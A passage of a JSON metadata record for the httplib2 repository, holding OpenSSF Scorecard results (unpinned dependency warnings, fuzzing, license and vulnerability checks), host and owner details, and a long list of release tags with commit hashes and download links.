https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0